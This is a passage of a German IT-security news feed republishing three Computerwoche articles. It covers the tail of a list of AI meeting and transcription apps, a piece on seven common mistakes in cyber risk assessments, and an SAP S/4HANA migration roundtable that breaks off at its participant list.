<h2 class="wp-block-heading">4. <a href="https://fathom.video/" target="_blank" rel="noreferrer noopener">Fathom</a></h2>



<p class="wp-block-paragraph">Dass virtuelle Meetings <a href="https://www.computerwoche.de/article/2820706/so-wirken-sie-kompetent-im-online-meetings.html" title="richtig schlimm werden können" target="_blank">richtig schlimm werden können</a>, wissen wir wohl alle. Und auch wenn selbst Generative AI Sie (noch) nicht davor bewahren kann, an digitalen Foltersessions teilzunehmen: Es gibt eine KI-App, die das erträglicher macht – Fathom.</p>



<p class="wp-block-paragraph">Bei dieser Anwendung handelt es sich um einen KI-Assistenten für Videokonferenzen in Form klassischer Software für <a href="https://www.computerwoche.de/operating-systems/" target="_blank" class="idgGlossaryLink">Windows</a>– oder Mac-Systeme, die wahlweise mit Zoom, Microsoft Teams oder Google Meet integriert wird. Nach der Installation läuft Fathom unauffällig im Hintergrund und transkribiert (über eine Kalender-Integration) entweder automatisch oder auf Knopfdruck sämtliche Videoanrufe. Notizen machen gehört damit in beiden Fällen der Vergangenheit an. Die Zusammenfassungen oder Informationen stehen direkt zur Verfügung und lassen sich gezielt durchsuchen, weiterverarbeiten oder auch in anderen Produktivitäts- und <a href="https://www.computerwoche.de/article/2794966/dokumente-gemeinsam-bearbeiten.html" title="Collaboration-Tools" target="_blank">Collaboration-Tools</a> wie Slack nutzen.</p>



<p class="wp-block-paragraph">Sämtliche Daten werden dabei laut Fathom während der Übertragung und im Ruhezustand verschlüsselt. Außerdem versprechen die Verantwortlichen ausdrücklich, keine KI-Modelle auf Kundendaten zu trainieren. Sämtliche Details zu Security- und Compliance-Themen sind – vorbildlicherweise – über ein <a href="https://trust.fathom.video/" title="dediziertes Trust Center" target="_blank" rel="noopener">dediziertes Trust Center</a> abrufbar.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" alt="Fathom realisiert ein umfassendes und sehr fokussiertes Personal-AI-Assistant-Erlebnis." title="Fathom realisiert ein umfassendes und sehr fokussiertes Personal-AI-Assistant-Erlebnis." src="https://images.computerwoche.de/bdb/3393111/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Fathom realisiert ein umfassendes und sehr fokussiertes Personal-AI-Assistant-Erlebnis.</p></figcaption></figure><p class="imageCredit">
					Foto: JR Raphael | IDG</p></div>




<p class="wp-block-paragraph">Die KI-Software unterstützt diverse verschiedene Sprachen, darunter Englisch, Französisch, Spanisch, Italienisch und Deutsch. Noch dazu ist Fathom komplett kostenlos nutzbar – ohne Einschränkungen hinsichtlich der Anzahl oder Länge der aufgezeichneten Videokonferenzen. Erst fortschrittlichere KI-Funktionen lässt sich das Team hinter der GenAI-Anwendung bezahlen.</p>



<p class="wp-block-paragraph">Die <a title="Fathom Team Edition" href="https://fathom.video/for/teams" target="_blank" rel="noopener">Fathom Team Edition</a> bietet weitergehende, fortschrittliche KI-Funktionen – beispielsweise automatisierte Keyword Alerts, Highlight-Zusammenstellungen oder Team-Management-Funktionen. Die kostenpflichtige Variante ermöglicht darüber hinaus die Integration in Enterprise-Systeme wie HubSpot, Salesforce oder Zapier. Die Preise beginnen bei <strong>15 Dollar pro Monat und User</strong>. Die kostenlose Version bietet Premium-Features für fünf Anrufe pro Monat.</p>



<h2 class="wp-block-heading">5. <a href="https://huggingface.co/spaces/Xenova/whisper-web" target="_blank" rel="noreferrer noopener">Whisper Web</a></h2>



<p class="wp-block-paragraph">Falls Sie bereits Audiodateien besitzen, die beispielsweise im Rahmen von Meetings oder Telefongesprächen entstanden sind und jetzt in Text umgewandelt werden sollen, ist Whisper Web die richtige Adresse – zumindest, wenn es sich um englischsprachige Audioaufnahmen handelt. Diese quelloffene Webanwendung basiert auf der Entwicklungsarbeit von <a title="OpenAI" href="https://openai.com/index/whisper/" target="_blank" rel="noopener">OpenAI</a> und bietet Echzeit-Transkriptionen direkt im Browser. Das <a title="Large Language Model" href="https://www.computerwoche.de/article/2823883/was-sind-llms.html" target="_blank">Large Language Model</a>, das dazu zum Einsatz kommt, wird über die App heruntergeladen und lokal ausgeführt – die Daten, die Sie der KI übermitteln, verlassen also das Device nicht.</p>



<p class="wp-block-paragraph">Whisper Web kann Audioinhalte entweder direkt über Ihr Mikrofon erfassen oder aus entsprechenden Audiodateien extrahieren. Laut den Entwicklern ist die KI-App auf mehrsprachige Daten trainiert und unterstützt auch die Transkription anderer Sprachen (zu Englisch). Der Test mit einem deutschsprachigen Audio-File brachte allerdings nicht mehr als undefiniertes Kauderwelsch hervor. Dafür ist das Tool Open Source und <strong>komplett kostenlos nutzbar</strong> – Sie benötigen dazu auch kein dediziertes Konto.</p>



<h2 class="wp-block-heading">6. <a href="https://audiopen.ai/" target="_blank" rel="noreferrer noopener">AudioPen</a></h2>



<p class="wp-block-paragraph">Wenn Sie nicht ohne Ihr Notizbuch (oder eine <a title="entsprechende App" href="https://www.computerwoche.de/article/2823914/notiz-apps-im-vergleich.html" target="_blank">entsprechende App</a>) auskommen, könnte das KI-Tool AudioPen sich zu Ihrer neuen Lieblings-App mausern. Die Software erfasst auf Knopfdruck Sprachnotizen jeglicher Art und erstellt daraus im Handumdrehen eine schriftliche Zusammenfassung. Und zwar in “schön”: Füllwörter oder Wiederholungen werden automatisiert eliminiert. Jede Aufnahme wandert direkt in das digitale Notizbuch und lässt sich anschließend durchsuchen, teilen oder auch in eine andere Sprache übersetzen. Auch bei AudioPen handelt es sich um eine vollständig <a title="webbasierte Applikation" href="https://audiopen.ai/download" target="_blank" rel="noopener">webbasierte Applikation</a>, die sich übrigens optional auch in Form einer <a title="Progressive Web App" href="https://www.computerwoche.de/article/2834608/tutorial-erste-schritte-mit-progressive-web-apps.html" target="_blank">Progressive Web App</a> installieren lässt.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" alt="AudioPen verwandelt selbst die wiederholungsintensivsten Selbstgespräche in prägnante Notizen." title="AudioPen verwandelt selbst die wiederholungsintensivsten Selbstgespräche in prägnante Notizen." src="https://images.computerwoche.de/bdb/3393112/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">AudioPen verwandelt selbst die wiederholungsintensivsten Selbstgespräche in prägnante Notizen.</p></figcaption></figure><p class="imageCredit">
					Foto: JR Raphael | IDG</p></div>




<p class="wp-block-paragraph">Das KI-Tool für Sprachnotizen ist <strong>kostenlos nutzbar</strong>, solange Sie sich auf Aufnahmen mit bis zu drei Minuten Länge und maximal zehn Notizen beschränken können. Für Ansprüche, die darüber hinausgehen, steht eine <a href="https://audiopen.ai/prime" target="_blank" rel="noreferrer noopener">“Prime”-Version der App</a> zur Verfügung, die mindestens <strong>99 Dollar pro Jahr</strong> kostet – dafür aber uneingeschränkt nutzbar ist und eine Reihe zusätzlicher Funktionen bietet. (fm)</p>



<p class="wp-block-paragraph"><strong>Dieser Beitrag ist <a href="https://www.computerworld.com/article/2505365/ai-powered-apps-that-actually-save-time.html" target="_blank">im Original</a> bei unserer Schwesterpublikation Computerworld.com erschienen.</strong></p>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[7 Wege, Risk Assessments an die Wand zu fahren]]></title>
<description><![CDATA[Wenn das Risk Assessment zu kurz greift, ist guter Rat teuer.Raushan_films | shutterstock.com



Ein Cyber Risk Assessment unterstützt dabei, potenzielle Bedrohungen und Schwachstellen für wichtige digitale und physische Unternehmens-Assets zu identifizieren, zu bewerten und zu priorisieren. Trot...]]></description>
<link>https://tsecurity.de/de/3687937/it-security-nachrichten/7-wege-risk-assessments-an-die-wand-zu-fahren/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687937/it-security-nachrichten/7-wege-risk-assessments-an-die-wand-zu-fahren/</guid>
<pubDate>Thu, 23 Jul 2026 06:09:17 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2025/07/Raushan_films-shutterstock_2452558257_16z9.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Manager Headache 16z9 GERMANY ONLY" class="wp-image-4022500" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">Wenn das Risk Assessment zu kurz greift, ist guter Rat teuer.</figcaption></figure><p class="imageCredit">Raushan_films | shutterstock.com</p></div>



<p class="wp-block-paragraph">Ein <a href="https://www.computerwoche.de/article/3552765/6-risk-assessment-frameworks-im-vergleich.html" target="_blank">Cyber Risk Assessment</a> unterstützt dabei, potenzielle Bedrohungen und Schwachstellen für wichtige digitale und physische Unternehmens-Assets zu identifizieren, zu bewerten und zu priorisieren. Trotzdem stolpern in diesem Zusammenhang immer noch viele CISOs und Sicherheitsentscheider über Fallstricke, die sie daran hindern, ihre Risk-Assessment-Ziele vollumfänglich zu erreichen.</p>



<p class="wp-block-paragraph">Welche das konkret sind und wie man sie gewissenhaft meidet, haben wir im Gespräch mit Security-Experten herausgefunden.</p>



<h2 class="wp-block-heading">1. Einfach nur abhaken</h2>



<p class="wp-block-paragraph">Die wohl größte Falle im Zusammenhang mit Risk Assessments besteht darin, diese als Checkliste zu behandeln – statt als Entscheidungshilfe, die mit realem Business Impact oder Threat-Szenarien verknüpft ist. <a href="https://www.linkedin.com/in/shirsendu64" target="_blank" rel="noreferrer noopener">Shirsendu Mondal</a>, Security-Forscher an der University of North Carolina, klärt auf: „Wenn sich Ihre Risikobewertung nur noch darum dreht, irgendwelche Kästchen abzuhaken, verlieren Sie die Fähigkeit, die tatsächlichen Risiken einer Umgebung zu Tage zu fördern. Das Ziel eines solchen Assessments sollte jedoch sein, aufzudecken, an welchen Stellen tatsächlich eine Gefährdungslage besteht.“ </p>



<p class="wp-block-paragraph">Der beste Weg, diese „Selbstzufriedenheits“-Falle zu umgehen, besteht laut dem Forscher darin, einen kontextorientierten Ansatz zu fahren: „Fragen Sie konkret danach, wo sich die betreffende Ressource befindet, wer darauf zugreifen kann, welche Daten sie berührt, wie wichtig sie für den Betrieb ist und was passiert, wenn sie ausfällt. Risiken sollten stets mit den geschäftlichen Auswirkungen korreliert werden – nicht bloß mit technischen Erkenntnissen.“</p>



<p class="wp-block-paragraph">Eben, weil Risiken seiner Ansicht nach mehr sind als nur technische Probleme, empfiehlt Mondal Security-Entscheidern, andere Führungskräfte aus dem Unternehmen in das Security-Gefüge zu integrieren – etwa aus der IT und dem Betrieb.</p>



<h2 class="wp-block-heading">2. Ergebnisse schönreden</h2>



<p class="wp-block-paragraph">Besonders in schwierigen Zeiten ist es das A und O, den Stakeholdern (und sich selbst) gegenüber ehrlich zu sein. Diese Auffassung vertritt auch <a href="https://www.linkedin.com/in/dr-pablo-riboldi" target="_blank" rel="noreferrer noopener">Pablo Riboldi</a>, CISO beim Softwareunternehmen BairesDev: „Wenn die Ergebnisse entmutigend sind, sollte man einfach zugeben, dass sich die Bedrohungslage deutlich schneller entwickelt hat, als über das bisherige Bewertungs-Framework abzusehen war.“</p>



<p class="wp-block-paragraph">Anstatt einfach nur <a href="https://www.computerwoche.de/article/3495294/schwachstellen-managen-die-6-besten-vulnerability-management-tools.html" target="_blank">Schwachstellen-Listen</a> zu übergeben, rät Riboldi dazu, konkrete Angriffsszenarien abzubilden: „Zum Beispiel, indem Sie die drei kritischsten Assets priorisieren und ein eingehendes Risk Assessment durchführen. So lässt sich auch ein unmittelbarer Mehrwert demonstrieren.“</p>



<h2 class="wp-block-heading">3. Scope falsch einschätzen</h2>



<p class="wp-block-paragraph">Nicht wenige CISOs sichern Dokumentenkontrollen ab, haken Compliance-Checkboxen ab und erstellen ein Risikoregister, das den Eindruck vermittelt, dass alles in Ordnung ist. Der Schein trügt jedoch des Öfteren, wie <a href="https://www.linkedin.com/in/deniscalderone" target="_blank" rel="noreferrer noopener">Denis Calderone</a>, CTO beim Sicherheitsdienstleister Suzu Labs, aus eigener Erfahrung weiß: „In solchen Fällen kommt es nicht selten vor, dass sich niemand die Mühe gemacht hat, zu testen, ob diese Kontrollen tatsächlich funktionieren. Oder, ob der Scope der Risikobewertung auch das abdeckt, worauf es wirklich ankommt.“</p>



<p class="wp-block-paragraph">Der Technologieentscheider hat dazu auch ein Beispiel aus der Praxis auf Lager: „Wenn das Risk Assessment die Produktionsserver und das Unternehmensnetzwerk umfasst, der alte Dev-Rechner, ein <a href="https://www.cowo.de/a/4195045" target="_blank" rel="noreferrer noopener">Drittanbieter-Portal</a> oder ein verwaister API-Endpunkt dabei aber außen vor bleiben, ist das ungünstig. Angreifer betrachten die gesamte Umgebung und finden genau den Einstiegspunkt, der zuvor als nicht bewertungswürdig erachtet wurde.“</p>



<p class="wp-block-paragraph">Künstliche Intelligenz (KI) <a href="https://www.computerwoche.de/article/4155663/6-wege-uber-ki-gehackt-zu-werden.html" target="_blank">verschlimmere die Situation</a> laut Calderone noch: Unternehmen setzten vielfach KI-Tools ein, verknüpften diese mit internen Systemen und gewährten ihnen Zugriff auf sensible Daten – ohne dass das in die Risikobewertung einfließe. Der Experte warnt: „Wenn Ihr Risk Assessment aufgesetzt wurde, bevor Ihr Unternehmen damit begonnen hat, KI in Workflows zu integrieren, ist es bereits veraltet.“</p>



<h2 class="wp-block-heading">4. Annahmen nicht hinterfragen</h2>



<p class="wp-block-paragraph">Wenn sich die Zielsetzung einer Risikobewertung in Richtung „Hauptsache bestanden“ verschiebt, stellt das vielleicht <a href="https://www.computerwoche.de/article/4149093/wenn-die-audit-falle-zuschnappt.html" target="_blank">Auditoren</a> zufrieden. Die Unternehmensleitung könnte dadurch jedoch in die Irre geführt werden, wie <a href="https://www.linkedin.com/in/amitbasu" target="_blank" rel="noreferrer noopener">Amit Basu</a>, CIO und CISO beim Schifffahrtsunternehmen International Seaways, erklärt: „Führungskräfte und Vorstandsmitglieder sehen ein fertiges Risikoregister und gehen davon aus, dass das Unternehmen geschützt ist. Unterdessen bleiben echte Bedrohungen unberücksichtigt, weil sie nicht nahtlos in den Bewertungsrahmen passten. Dieser Fallstrick ist unsichtbar – er verbirgt sich hinter einem Dashboard.“</p>



<p class="wp-block-paragraph">Nach Ansicht von Basu ist ein Risk Assessment nur so gut, wie die ihm zugrundeliegenden Annahmen: „Diese sollten Sie explizit dokumentieren und immer dann überprüfen, wenn sich das Business verändert, eine Bedrohungslage verschiebt oder ein Sicherheitsvorfall eine Lücke zu Tage fördert.“</p>



<p class="wp-block-paragraph">Ein Risk Assessment, so der CISO, sei nicht als fertiges Produkt zu betrachten, sondern als lebendiger Beitrag zu einem fortlaufenden Dialog zwischen Security-Abteilung und Unternehmen.</p>



<h2 class="wp-block-heading">5. Risiken nicht mit Impact verknüpfen</h2>



<p class="wp-block-paragraph">Probleme in den Hintergrund zu rücken oder herunterzuspielen, fällt deutlich leichter, wenn man den Zusammenhang zwischen Risiko und Business einfach ausblendet. Das erkennt auch <a href="https://www.linkedin.com/in/mooreds" target="_blank" rel="noreferrer noopener">Dan Moore</a>, Senior Director of Strategy and Identity Standards beim CIAM-Spezialisten FusionAuth, an. Er warnt jedoch vor den Folgen dieses Gebarens: „So wird es sich diffizil gestalten, tatsächliche Risiken zu kommunizieren. Schlimmer noch: Es liefert den Mitgliedern des Security-Teams einen Vorwand, sich darüber zu beschweren, dass sie missverstanden oder nicht wertgeschätzt werden – und das beeinträchtigt die Effektivität des Teams.“</p>



<p class="wp-block-paragraph">Der Manager erachtet es als wichtig, stattdessen konkret zu sein und zielgerichtet vorzugehen: „Verzichten Sie auf Angaben wie eine Patch-Compliance von 95 Prozent. Sprechen Sie stattdessen über das Risiko, das nicht gepatchte Systeme für das Unternehmen darstellen.“</p>



<p class="wp-block-paragraph">Dabei seien manchen Systemen – etwa Legacy-Konstrukten, die nicht mit dem Internet verbunden sind – geringere Risiken inhärent als anderen, selbst wenn sie dieselben Patch-Probleme aufwiesen, meint Moore und empfiehlt, diese Tatsache anzuerkennen und die Reaktion entsprechend abzuwägen.  </p>



<h2 class="wp-block-heading">6. Compliance mit Security verwechseln</h2>



<p class="wp-block-paragraph">„Compliance allein ist weder ein Garant für robuste Security, noch erfüllt sie die Mindestanforderungen für einen wirksamen Schutz“, hält <a href="https://www.linkedin.com/in/adrieldesautels" target="_blank" rel="noreferrer noopener">Adriel Desautels</a>, CEO der Security-Beratung Netragard, fest.</p>



<p class="wp-block-paragraph">Unternehmen gerieten demnach besonders oft in diese Falle, wenn sie für Penetrationstests externe Firmen beauftragten, die sich auf Compliance konzentrieren und gleichzeitig „erstklassige Dienstleistungen“ versprechen. „In Wahrheit liefern diese oft automatisierte Scans, die als manuelle Tests getarnt sind“, meint Desautels.</p>



<p class="wp-block-paragraph">Das Ergebnis sei ein falsches Sicherheitsgefühl, warnt der Manager: „Vergegenwärtigen Sie sich einfach, dass bei jedem größeren Sicherheitsvorfall der letzten zehn Jahre eine Organisation beteiligt war, die zum Zeitpunkt des Angriffs alle Compliance-Vorgaben erfüllt hatte.“</p>



<h2 class="wp-block-heading">7. Risiken nicht vollständig verstehen</h2>



<p class="wp-block-paragraph">Unternehmen betrachten Risk Assessments oft als eine Art „Schwachstellenkatalogisierung“, bei der es darum geht, Lücken zu finden, Schweregrade zu erfassen und Audits zu bestehen. Letzteres heißt allerdings nicht, dass die Risiken auch verstanden wurden.</p>



<p class="wp-block-paragraph">Geht es nach <a href="https://www.linkedin.com/in/safiraza" target="_blank" rel="noreferrer noopener">Safi Raza</a>, Senior Director for Cybersecurity bei Fusion Risk Management, sollten sich CISOs darauf konzentrieren, technische Risikosignale mit betrieblichen Folgen zu verknüpfen: „Dazu muss man verstehen, welche Services betroffen sind, wie sich Störungen ausbreiten und was das für den Umsatz, die Kunden oder regulatorische Verpflichtungen bedeutet.“</p>



<p class="wp-block-paragraph">Der Experte rät in diesem Zusammenhang dazu, zunächst von statischen Bewertungen zu einer kontinuierlichen, kontextbezogenen Risikotransparenz überzugehen, um sicherzustellen, dass Risiken nicht nur technisch verstanden werden.“ (fm)</p>



<p class="wp-block-paragraph"><strong>Dieser Artikel ist </strong><a href="https://www.csoonline.com/article/4189703/7-cyber-risk-assessment-gotchas-to-avoid.html" target="_blank"><strong>im Original</strong></a><strong> bei unserer Schwesterpublikation CSOonline.com erschienen.</strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[SAP S/4HANA-Transformation zwischen Aufbruch und Realität]]></title>
<description><![CDATA[Ob hybrides Betriebsmodell oder Kostenfrage, am Ende entscheidet über den Projekterfolg nicht allein die Technologie.hasan as’ari – shutterstock.com



SAP-Anwenderunternehmen stehen unter Druck, auf SAP S/4HANA zu wechseln, weil die Mainstream-Wartung für SAP ERP (SAP ECC 6.0) Ende 2027 ausläuft...]]></description>
<link>https://tsecurity.de/de/3687936/it-security-nachrichten/sap-s4hana-transformation-zwischen-aufbruch-und-realitaet/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687936/it-security-nachrichten/sap-s4hana-transformation-zwischen-aufbruch-und-realitaet/</guid>
<pubDate>Thu, 23 Jul 2026 06:09:16 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/shutterstock_2443989867_16x9.png?w=1024" alt="ERP SAP Studie 27" class="wp-image-4199877" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Ob hybrides Betriebsmodell oder Kostenfrage, am Ende entscheidet über den Projekterfolg nicht allein die Technologie</p>.</figcaption></figure><p class="imageCredit">hasan as’ari – shutterstock.com</p></div>



<p class="wp-block-paragraph">SAP-Anwenderunternehmen stehen unter Druck, auf SAP S/4HANA zu wechseln, weil die Mainstream-Wartung für SAP ERP (SAP ECC 6.0) Ende 2027 ausläuft und die bis Ende 2030 geltende erweiterte Wartung kostenpflichtig ist.</p>



<p class="wp-block-paragraph">Zwar stellt SAP mit der „<a href="https://www.computerwoche.de/article/3816544/sap-kommt-kunden-entgegen.html">SAP ERP, Private Edition, Transition Option</a>“ eine weitere Wartungsverlängerung bis 2033 in Aussicht. Da diese einer Neuimplementierung gleichkommt, bleibt SAP-Kunden mehr Zeit für die Planung, die Analyse und das Changemanagement. Der Nachteil: Wer diese Option nutzt, läuft Gefahr, technologisch ins Hintertreffen zu geraten, da Innovationen nahezu ausschließlich für SAP S/4HANA bereitgestellt werden.</p>



<h2 class="wp-block-heading">Zögerliche SAP-S/4HANA-Transformation trotz Wartungsdruck</h2>



<p class="wp-block-paragraph">Obwohl der Druck hoch ist, hat eine große Zahl der SAP-Bestandskunden die Transformation auf die seit 2015 verfügbare ERP-Suite offenbar noch nicht vollzogen. Eine COMPUTERWOCHE-Expertenrunde zeigte, wo die größten Hürden liegen und was erfolgreiche Projekte auszeichnet.</p>



<p class="wp-block-paragraph">Warum etliche Unternehmen die Transformation vor dem regulären Wartungsende scheuen und stattdessen zwei Prozent Mehrkosten für die erweiterte Wartung einkalkulieren, brachte ein Teilnehmender auf den Punkt: Firmen haben über Jahrzehnte in ihre SAP-ERP-Lösung investiert und sie an individuelle Prozessanforderungen angepasst, damit die Abläufe entlang der Supply Chain reibungslos laufen. Er habe daher in den vergangenen zehn Jahren keinen Kunden erlebt, der freiwillig umsteigen wollte. Alle hätten gesagt, dass sie müssen.</p>



<p class="wp-block-paragraph">Nach Erfahrungswerten eines weiteren Experten nutzen erst rund 20 Prozent der SAP-Kunden SAP S/4HANA als Kernapplikation produktiv, unter anderem, weil entsprechende Transformationsprojekte auf sieben bis neun Jahre angelegt sind.</p>



<h2 class="wp-block-heading">Altlasten bremsen die SAP-S/4HANA-Transformation</h2>



<p class="wp-block-paragraph">Unternehmen, die sich für den Wechsel entscheiden, verzichten häufig auf jede Modernisierung. Sie vollziehen einen Eins-zu-eins-Umstieg ohne Code-Modifikation, sei es in Form einer System Conversion (Brownfield-Ansatz) oder per Lift and Shift in SAP Cloud ERP Private (früher: SAP S/4HANA Cloud Private Edition). Dabei ist eine große Zahl von SAP-ERP-Installationen gar nicht zukunftsfähig, weil sie auf Prozessen aus den 1990er Jahren basieren und im Lauf der Jahre durch zahlreiche Eigenentwicklungen erweitert wurden.</p>



<p class="wp-block-paragraph">Nicht selten gibt es bis zu mehrere tausend kundeneigene Programme im Z/Y-Namensraum, die zum Teil nicht mehr genutzt werden und das System unnötig belasten. Die Experten waren sich einig, dass eine solche rein technische Migration, bei der Altlasten wie ABAP-Eigenentwicklungen mitgeschleppt werden, keinen Mehrwert für das Unternehmen bringt.</p>



<p class="wp-block-paragraph">Es muss geprüft werden, welche Eigenentwicklungen beibehalten werden, weil sie wettbewerbsdifferenzierend und damit geschäftskritisch sind, und welche gelöscht werden müssen, weil sie nicht genutzt werden oder weil es dafür inzwischen SAP-Standardfunktionen gibt. Handlungsbedarf besteht auch bei einer dreistelligen Anzahl von Buchungskreisen, von denen niemand weiß, welche noch benötigt werden, oder bei zahlreichen Dubletten in den Kreditoren- und Debitorenstammdaten.</p>



<figure class="wp-block-table"><div class="overflow-table-wrapper"><table class="has-fixed-layout"><tbody><tr><td><strong>Studie “SAP S4HANA”: Sie können sich noch beteiligen!</strong></td></tr><tr><td>Zum Thema SAP S4HANA führt die COMPUTERWOCHE derzeit eine Multi-Client-Studie unter IT-Verantwortlichen durch. Haben Sie Fragen zu dieser Studie oder wollen Partner bei dieser Studie werden, helfen wir Ihnen unter <a href="mailto:research-sales@foundryco.com" target="_blank" rel="noreferrer noopener">research-sales@foundryco.com</a> gerne weiter. </td></tr></tbody></table> </div></figure>



<h2 class="wp-block-heading">Migrations-Tools und KI-Agenten beschleunigen den Umstieg</h2>



<p class="wp-block-paragraph">Um diesen Prüf- und Bereinigungsaufwand zu bewältigen, bietet SAP mehrere Tools, um die Transformation auf SAP S/4HANA zu vereinfachen: darunter SAP Activate, SAP Cloud ALM, Migration Cockpit, Readiness Check, Custom-Code-Check oder Modifikationsabgleich. Ergänzt werden sie durch Lösungen wie Signavio für die Prozessanalyse. Die Experten schätzen den Effizienzgewinn durch solche Migrationswerkzeuge auf 30 bis 50 Prozent.</p>



<p class="wp-block-paragraph">Zusätzliche Produktivität versprechen KI-Agenten, die Altsysteme automatisiert analysieren, Code bereinigen und Datenflüsse transformieren. Das reduziert den Migrationsaufwand und beschleunigt den Umstieg.</p>



<h2 class="wp-block-heading">Scope-Management als Schlüssel für den Projekterfolg</h2>



<p class="wp-block-paragraph">Einig waren sich die Teilnehmenden, dass SAP-S/4HANA-Transformationsprojekte in der Regel nicht an der Technologie scheitern, sondern an einer mangelhaften Scope-Definition und am unzureichenden Changemanagement.</p>



<p class="wp-block-paragraph">Ein Scope-Management vor dem Projektstart, das berücksichtigt, wie viel Veränderung der IT-Organisation und den Fachbereichen zugemutet werden kann, sei essenziell für den Erfolg, sagte einer der Teilnehmenden. Es erfordert die Fähigkeit zu priorisieren und ein iteratives Vorgehen, bei dem zunächst geschäftskritische Must-haves und Quick Wins umgesetzt werden. Weniger wichtige Nice-to-haves folgen später. Wer dagegen in der Konzeptionsphase bereits den großen Wurf anstrebt, wird voraussichtlich scheitern. Als Beispiel wurde der direkte Umstieg auf ein SAP-S/4HANA-Kernsystem genannt, das nach dem Clean-Core-Ansatz von nicht mehr lauffähigen Programmen und obsoleten Erweiterungen bereinigt ist.</p>



<p class="wp-block-paragraph">Genauso wichtig ist ein Change-Management, das Mitarbeitende von Beginn an einbezieht, die nötige Akzeptanz schafft und vom Top-Management aktiv unterstützt wird, sowie eine verbindliche Governance mit klaren Zielvorgaben. Unverzichtbar ist auch die Einbindung der Fachbereiche. Sie stellt die größte Herausforderung dar, da Unternehmen befürchten, dass durch die SAP-S/4HANA-Transformation zu viele personelle Ressourcen gebunden werden, die dann für Kernaufgaben fehlen. Kommt es vor, dass IT und Fachbereiche als Antipoden agieren, sollte ein Change-Coach als Vermittler eingesetzt werden.</p>



<h2 class="wp-block-heading">Hybride Betriebsmodelle setzen sich langfristig durch</h2>



<p class="wp-block-paragraph">Bereits vor dem Projektstart muss abschließend geklärt sein, welches Betriebsmodell für SAP S/4HANA am besten zu einem Unternehmen und seinen Zielen passt, auch mit Blick auf regulatorische Anforderungen. Das ist häufig nicht der Fall, sodass das Projektteam unnötig Zeit damit verbringt, das passende Betriebsmodell zu ermitteln. Das bremst Transformationsvorhaben aus.</p>



<p class="wp-block-paragraph">Nach Ansicht eines Teilnehmenden wird sich langfristig ein hybrides Betriebsmodell durchsetzen, bei dem der SAP-Kunde entscheidet, welche Elemente der SAP-S/4HANA-Landschaft in einer Hyperscaler-Cloud, einer souveränen Cloud und/oder On-Premises laufen. Eine weitere, weitgehend unbekannte Möglichkeit ist der Betrieb im Rahmen der Customer-Data-Center-Option (CDC) von SAP Cloud ERP Private (früher: SAP S/4HANA Cloud Private Edition), die aus Gründen wie Datenschutz, Leistung und Souveränität eine interessante Alternative sein kann.</p>



<p class="wp-block-paragraph">Mehrere Experten stellen darüber hinaus fest, dass die vollwertige SaaS-Lösung SAP Cloud ERP Public (früher: SAP S/4HANA Cloud Public Edition) inzwischen verstärkt eingesetzt wird. Sie stellt vorkonfigurierte Kern-ERP-Funktionen (Best Practices) bereit und lässt sich relativ schnell einführen, ermöglicht aber kaum individuelle Anpassungen. Diese Abstriche nehmen Unternehmen in Kauf, um von regelmäßigen, automatischen Upgrades und technologischen Innovationen zu profitieren.</p>



<p class="wp-block-paragraph">Kritisiert wurde allerdings, dass die Cloud-Diskussion häufig unter begrifflichen Unschärfen leidet. So macht der Betrieb von SAP S/4HANA in einer Hyperscaler- oder SAP-Cloud die Lösung noch lange nicht zum Software-as-a-Service-Angebot. Solche Ungenauigkeiten irritierten SAP-Kunden und bremsten die Entscheidungsfindung. Letztlich sind beim Cloud-Betrieb auch die Kosten entscheidend. Zwar wollen viele Unternehmen anfangs maximale Sicherheit mit Private Network und Confidential Computing, wählen dann aber günstigere Commercial-Cloud-Angebote. Ausnahmen bilden regulierte Branchen und der öffentliche Sektor.</p>



<p class="wp-block-paragraph">Ob hybrides Betriebsmodell oder Kostenfrage, am Ende entscheidet über den Projekterfolg nicht allein die Technologie, sondern auch, wie diszipliniert Scope und Wandel im Unternehmen gesteuert werden.</p>



<h2 class="wp-block-heading">Teilnehmer der Round-Table “SAP S4HANA 2027”</h2>


